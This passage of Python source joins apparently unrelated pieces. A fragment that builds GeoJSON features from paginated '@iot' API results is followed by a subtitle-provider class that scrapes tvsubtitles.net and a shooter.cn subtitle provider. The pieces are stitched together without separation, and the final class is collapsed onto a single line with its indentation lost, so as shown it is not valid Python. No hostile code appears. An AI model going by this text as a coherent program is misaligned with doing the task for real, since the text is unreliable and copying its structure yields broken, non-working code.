        hits_ = 1 if identifier else min(limit, response.get('@iot.count'))
        while len(v) < hits_:
            LOGGER.debug('Fetching next set of values')
            next_ = response.get('@iot.nextLink', None)
            if next_ is None:
                break
            with s.get(next_) as r:
                response = r.json()
                v.extend(response.get('value'))

    # Properties filter & display
    keys = (() if not self.properties and not select_properties
            else set(self.properties) | set(select_properties))

    for entity in v[:hits_]:
        # Make feature; string ids are quoted to keep them unambiguous
        id = entity.pop(self.id_field)
        id = f"'{id}'" if isinstance(id, str) else str(id)
        f = {
            'type': 'Feature', 'properties': {},
            'geometry': None, 'id': id
        }

        # Make geometry
        if not skip_geometry:
            f['geometry'] = self._geometry(entity)

        # Fill properties block
        try:
            f['properties'] = self._expand_properties(entity, keys)
        except KeyError as err:
            LOGGER.error(err)
            raise ProviderQueryError(err)

        feature_collection['features'].append(f)

    feature_collection['numberReturned'] = len(
        feature_collection['features'])

    if identifier:
        return f
    else:
        return feature_collection
class TVsubtitlesProvider(Provider):
    """Provider for tvsubtitles.net (episodes only)."""

    languages = {Language('por', 'BR')} | {Language(l) for l in [
        'ara', 'bul', 'ces', 'dan', 'deu', 'ell', 'eng', 'fin', 'fra', 'hun',
        'ita', 'jpn', 'kor', 'nld', 'pol', 'por', 'ron', 'rus', 'spa', 'swe',
        'tur', 'ukr', 'zho'
    ]}
    video_types = (Episode,)
    server_url = 'http://www.tvsubtitles.net/'

    def initialize(self):
        """Open the shared HTTP session used for all provider requests."""
        self.session = Session()
        self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__

    def terminate(self):
        """Close the shared HTTP session."""
        self.session.close()

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def search_show_id(self, series, year=None):
        """Search the show id from the `series` and `year`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int or None
        :return: the show id, if any.
        :rtype: int or None
        """
        # make the search
        logger.info('Searching show id for %r', series)
        r = self.session.post(self.server_url + 'search.php',
                              data={'q': series}, timeout=10)
        r.raise_for_status()

        # get the series out of the suggestions
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])
        show_id = None
        for suggestion in soup.select('div.left li div a[href^="/tvshow-"]'):
            match = link_re.match(suggestion.text)
            if not match:
                logger.error('Failed to match %s', suggestion.text)
                continue

            if match.group('series').lower() == series.lower():
                if year is not None and int(match.group('first_year')) != year:
                    logger.debug('Year does not match')
                    continue
                # href looks like "/tvshow-<id>.html"; slice extracts <id>
                show_id = int(suggestion['href'][8:-5])
                logger.debug('Found show id %d', show_id)
                break

        return show_id

    @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME)
    def get_episode_ids(self, show_id, season):
        """Get episode ids from the show id and the season.

        :param int show_id: show id.
        :param int season: season of the episode.
        :return: episode ids per episode number.
        :rtype: dict
        """
        # get the page of the season of the show
        logger.info('Getting the page of show id %d, season %d',
                    show_id, season)
        # NOTE(review): no r.raise_for_status() here, unlike search_show_id —
        # an HTTP error page would be parsed as an empty result; confirm
        # whether that is intentional.
        r = self.session.get(self.server_url + 'tvshow-%d-%d.html'
                             % (show_id, season), timeout=10)
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # loop over episode rows
        episode_ids = {}
        for row in soup.select('table#table5 tr'):
            # skip rows that do not have a link to the episode page
            if not row('a', href=episode_id_re):
                continue

            # extract data from the cells
            cells = row('td')
            episode = int(cells[0].text.split('x')[1])
            episode_id = int(cells[1].a['href'][8:-5])
            episode_ids[episode] = episode_id

        if episode_ids:
            logger.debug('Found episode ids %r', episode_ids)
        else:
            logger.warning('No episode ids found')

        return episode_ids

    def query(self, series, season, episode, year=None):
        """Search subtitles for a single episode; returns a list (possibly
        empty when the show or episode cannot be resolved)."""
        # search the show id
        show_id = self.search_show_id(series, year)
        if show_id is None:
            logger.error('No show id found for %r (%r)', series, {'year': year})
            return []

        # get the episode ids
        episode_ids = self.get_episode_ids(show_id, season)
        if episode not in episode_ids:
            logger.error('Episode %d not found', episode)
            return []

        # get the episode page
        logger.info('Getting the page for episode %d', episode_ids[episode])
        r = self.session.get(self.server_url + 'episode-%d.html'
                             % episode_ids[episode], timeout=10)
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # loop over subtitles rows
        subtitles = []
        for row in soup.select('.subtitlen'):
            # read the item
            language = Language.fromtvsubtitles(row.h5.img['src'][13:-4])
            subtitle_id = int(row.parent['href'][10:-5])
            page_link = self.server_url + 'subtitle-%d.html' % subtitle_id
            rip = row.find('p', title='rip').text.strip() or None
            release = row.find('p', title='release').text.strip() or None

            subtitle = TVsubtitlesSubtitle(language, page_link, subtitle_id,
                                           series, season, episode, year, rip,
                                           release)
            logger.debug('Found subtitle %s', subtitle)
            subtitles.append(subtitle)

        return subtitles

    def list_subtitles(self, video, languages):
        """List subtitles for `video` restricted to `languages`."""
        return [s for s in self.query(video.series, video.season,
                                      video.episode, video.year)
                if s.language in languages]

    def download_subtitle(self, subtitle):
        """Download `subtitle` content (served as a single-file zip)."""
        # download as a zip
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(self.server_url + 'download-%d.html'
                             % subtitle.subtitle_id, timeout=10)
        r.raise_for_status()

        # open the zip
        with ZipFile(io.BytesIO(r.content)) as zf:
            if len(zf.namelist()) > 1:
                raise ProviderError('More than one file to unzip')

            subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class ShooterProvider(Provider): languages = {Language.fromalpha2(l) for l in ["zh"]} required_hash = "shooter" def initialize(self): self.session = Session() self.session.headers = {"User-Agent": "SPlayer Build 2437"} def terminate(self): self.session.close() def query(self, hash): # shooter has many DNS mirrors, e.g. splayer[1-9], but one is enough params = {"pathinfo": "temp", "format": "json", "filehash": hash} logger.info("Searching subtitles %r", params) r = self.session.get("https://www.shooter.cn/api/subapi.php", params=params, timeout=10) r.raise_for_status() # loop over, server always returns found or not subtitles = [] try: for it in r.json(): # It normally contains one File, but can contain multiple link = it["Files"][0]["Link"] subtype = it["Files"][0]["Ext"] subtitle = ShooterSubtitle(Language.fromalpha2("zh"), hash, link, subtype) logger.debug("Found subtitle %r", subtitle) subtitles.append(subtitle) return subtitles except: logger.debug("No subtitle found") return [] def list_subtitles(self, video, languages): return [s for s in self.query(video.hashes["shooter"]) if s.language in languages] def download_subtitle(self, subtitle): logger.info("Download subtitle %r", subtitle.link) r = self.session.get(subtitle.link, params=None, timeout=10) r.raise_for_status() subtitle.content = fix_line_ending(r.content)